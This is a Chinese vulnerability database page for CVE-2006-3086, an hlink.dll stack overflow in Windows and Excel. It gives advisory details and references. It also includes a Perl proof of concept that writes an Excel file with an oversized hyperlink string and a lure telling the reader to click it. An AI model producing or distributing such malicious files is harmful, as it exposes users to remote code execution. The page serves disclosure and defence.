Microsoft HLINK.DLL链接 栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110474 漏洞类型 缓冲区溢出
发布时间 2006-06-18 更新时间 2006-08-09
CVE编号 CVE-2006-3086 CNNVD-ID CNNVD-200606-375
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/1927
https://www.securityfocus.com/bid/18500
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-375
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。MicrosoftWindows的hlink.dll在处理超级链接时存在栈溢出漏洞。攻击者可以通过构建恶意超链接来利用此漏洞。如果用户单击网站、Office文件或电子邮件中的恶意链接,可能会导致允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。要利用此漏洞,需要进行用户交互。
|漏洞EXP
###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

   my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

   $worksheet = $workbook->add_worksheet();

   $format = $workbook->add_format();
   $format->set_bold();
   $format->set_color('red');
   $format->set_align('center');

   $col = $row = 5;
   $worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

   $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
   $worksheet->write_url(0, 0, "$a", "LINK");

# milw0rm.com [2006-06-18]
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|参考资料

来源:US-CERT
名称:VU#394444
链接:http://www.kb.cert.org/vuls/id/394444
来源:MISC
链接:http://www.tippingpoint.com/security/advisories/TSRT-06-10.html
来源:BUGTRAQ
名称:20060808TSRT-06-10:MicrosoftHLINK.DLL
链接ObjectLibraryBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442724/100/0/threaded
来源:VUPEN
名称:ADV-2006-2431
链接:http://www.frsirt.com/english/advisories/2006/2431
来源:SECTRACK
名称:1016339
链接:http://securitytracker.com/id?1016339
来源:SECUNIA
名称:20748
链接:http://secunia.com/advisories/20748
来源:XF
名称:excel-hlink-bo(27224)
链接:http://xforce.iss.net/xforce/xfdb/27224
来源:BID
名称:18500
链接:http://www.securityfocus.com/bid/18500
来源:BUGTRAQ
名称:20060623Re:MSExcelRemoteCodeExecutionPOCExploit
链接:http://www.securityfocus.com/archive/1/archive/1/438373/100/0/threaded
来源:BUGTRAQ
名称:20060623Re:Re:MSExcelRemoteCodeExecutionPOCExploit
链接:http://www.securityfocus.com/archive/1/archive/1/438156/100/0/threaded
来源:BUGTRAQ
名称:20060622Re:MSExcelRemoteCodeExecutionPOCExploit
链接:http://www.secu